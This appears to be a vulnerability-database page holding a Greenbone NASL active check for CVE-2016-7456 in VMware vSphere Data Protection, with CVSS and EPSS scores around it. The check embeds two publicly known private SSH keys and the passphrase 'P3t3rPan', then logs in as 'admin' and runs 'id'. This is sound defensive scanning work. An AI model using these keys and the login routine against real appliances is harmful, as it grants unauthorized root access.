10 High
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.7 High
AI Score
Confidence
High
0.083 Low
EPSS
Percentile
94.4%
VMware vSphere Data Protection (VDP) updates address SSH key-based authentication issue.
# SPDX-FileCopyrightText: 2016 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.140103");
script_cve_id("CVE-2016-7456");
script_tag(name:"cvss_base", value:"10.0");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
script_version("2023-06-28T05:05:21+0000");
script_name("VMware vSphere Data Protection (VDP) updates address SSH Key-Based authentication issue (VMSA-2016-0024, admin_key) - Active Check");
script_xref(name:"URL", value:"http://www.vmware.com/security/advisories/VMSA-2016-0024.html");
script_tag(name:"vuldetect", value:"Try to login with a known private SSH key.");
script_tag(name:"solution", value:"Apply the update from the referenced vendor advisory.");
script_tag(name:"summary", value:"VMware vSphere Data Protection (VDP) updates address SSH key-based authentication issue.");
script_tag(name:"insight", value:"VDP contains a private SSH key with a known password that is configured to allow key-based
authentication. Exploitation of this issue may allow an unauthorized remote attacker to log into the appliance with root privileges.");
script_tag(name:"affected", value:"VDP 6.1.x, 6.0.x, 5.8.x, 5.5.x.");
script_tag(name:"last_modification", value:"2023-06-28 05:05:21 +0000 (Wed, 28 Jun 2023)");
script_tag(name:"severity_vector", value:"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
script_tag(name:"severity_origin", value:"NVD");
script_tag(name:"severity_date", value:"2017-01-03 18:43:00 +0000 (Tue, 03 Jan 2017)");
script_tag(name:"creation_date", value:"2016-12-28 11:03:22 +0100 (Wed, 28 Dec 2016)");
script_tag(name:"qod_type", value:"exploit");
script_tag(name:"solution_type", value:"VendorFix");
script_category(ACT_ATTACK);
script_family("General");
script_copyright("Copyright (C) 2016 Greenbone AG");
script_dependencies("ssh_detect.nasl", "gb_default_credentials_options.nasl");
script_require_ports("Services/ssh", 22);
script_mandatory_keys("ssh/server_banner/available");
script_exclude_keys("default_credentials/disable_default_account_checks");
exit(0);
}
# If optimize_test = no
if(get_kb_item("default_credentials/disable_default_account_checks"))
exit(0);
include("ssh_func.inc");
include("misc_func.inc");
include("port_service_func.inc");
port = ssh_get_port(default:22);
if(ssh_dont_try_login(port:port))
exit(0);
keys = make_list(
'-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,A0FC854090ADCD630A163F3FD6380E4F
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
-----END RSA PRIVATE KEY-----',
'-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,DFDBC4B8EF3708FC
f2/1GJu45AtuQBlhokUib9T3m4o54cehWHx5z/BdbUYpTqsf7420/Dsb2o69ALR0
4KzNQ9KWAGH6lt/XqCrzVOOHZ8WeWDUgW3oNzJ3Xbbhu+oxp2ENzEvrAiudqhQWo
Il491n4EHTuu7dyz3sWUPEwrV/TC8b33tauoXu7v97J1wE3IC/NTHscP0M6HBOEd
Ql+vyTRla2ZI7SWWg50CoqeKqrbDwace/ywccNz+G4TnfVOn32d9RZ1pPxOWofzp
FzM7Qnflf8zz4SGjd2izHgB9yz4eXkAlV0pJH1RKcn0SIKm05y9igbGNWoauvWtS
cmtpq7plMvklyA875cDa+qYBKx9MUIz+dj6HlcNi/Rc+e5/nhN5UgAGVyJoQO9vy
plEgoBObb4Ep6/no+EwlKo9/pcOXmuMptRIg+WFb9e1nPey917HEJUmFhiZ1bc/v
P/8PY/7N0sZdove3nNMTsIpiHYp8dJKnHo9pHnzV3YoTTAkHuMu2+JF2Btr0aw5W
io6GP06qe9dgb9mmhmAxwKi7O/bosJXrjP1aWKhxB8womMSEkqF0d2kbd/mX5z+Z
gezMIvU8ZJs/4hr+DJCqhM0Wi2cptu0ofr723brpk226CJrXTQPw7HHlwX3DGyYo
E1GRiRk0XiU/T2MszmBtCcFyPf/eZF8cGmoyEqk1VqOoMB9v9zFucrgmPeKZSP0E
c8JBnZ/T+zERQEHTVpJhsRuWoQUamXRvdVKUhvKC4XvWkpSoH9CDm8LTDxhr6EKo
TcPSa3ARIpbuoPzOkR4osl+gzZzTaSHXUTbMPh79d3E=
-----END RSA PRIVATE KEY-----');
user = "admin";
pf = "P3t3rPan";
foreach key ( keys )
{
if( ! soc = open_sock_tcp( port ) )
continue;
login = ssh_login( socket:soc, login:user, password:NULL, priv:key, passphrase:pf );
if( login == 0 )
{
cmd = "id";
res = ssh_cmd( socket:soc, cmd:cmd );
close( soc );
if( res =~ "uid=[0-9]+.*gid=[0-9]+" )
{
security_message( port:port, data:'It was possible to login as user "' + user + '" using a known SSH private key with passphrase "' + pf + '" and to execute the "' + cmd + '" command. Result:\n\n' + res);
exit( 0 );
}
exit( 0 );
}
if( soc ) close( soc );
}
exit( 99 );
10 High
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.7 High
AI Score
Confidence
High
0.083 Low
EPSS
Percentile
94.4%